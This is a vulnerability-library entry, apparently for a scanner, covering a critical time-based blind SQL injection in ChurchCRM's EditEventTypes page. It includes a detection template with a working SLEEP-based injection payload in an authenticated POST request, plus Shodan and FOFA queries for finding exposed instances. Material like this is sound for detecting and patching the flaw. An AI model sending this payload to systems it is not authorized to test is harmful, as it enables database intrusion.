/Vulnerability Library

ChurchCRM - SQL Injection

CVE-2025-1023
Early Release

Description

A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.

Severity

Critical

CVSS Score

9.8

Exploit Probability

1%

Affected Product

churchcrm

Published Date

November 3, 2025

Template Author

kazgangap

CVE-2025-1023.yaml
id: CVE-2025-1023

info:
  name: ChurchCRM - SQL Injection
  author: Kazgangap
  severity: critical
  description: |
    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
  reference:
    - https://github.com/ChurchCRM/CRM/issues/7246
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1023
    cwe-id: CWE-89
    epss-score: 0.00706
    epss-percentile: 0.71338
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2025,authenticated,churchcrm,sqli

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
        @timeout 30s
        POST /EditEventTypes.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 8'
          - 'status_code_2 == 500'
          - 'contains(body_2, "<title>ChurchCRM: Edit Event Types")'
        condition: and
# digest: 4b0a00483046022100f8703dfa6c3c1162348c4f804ef30f0c0da3c086305dc8fd8662e7e5d8c29b130221009e33488e5dd3671cf655c579bd898c556592719cfbe78594863040e1deb8ad91:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-1023
CWE ID:
cwe-89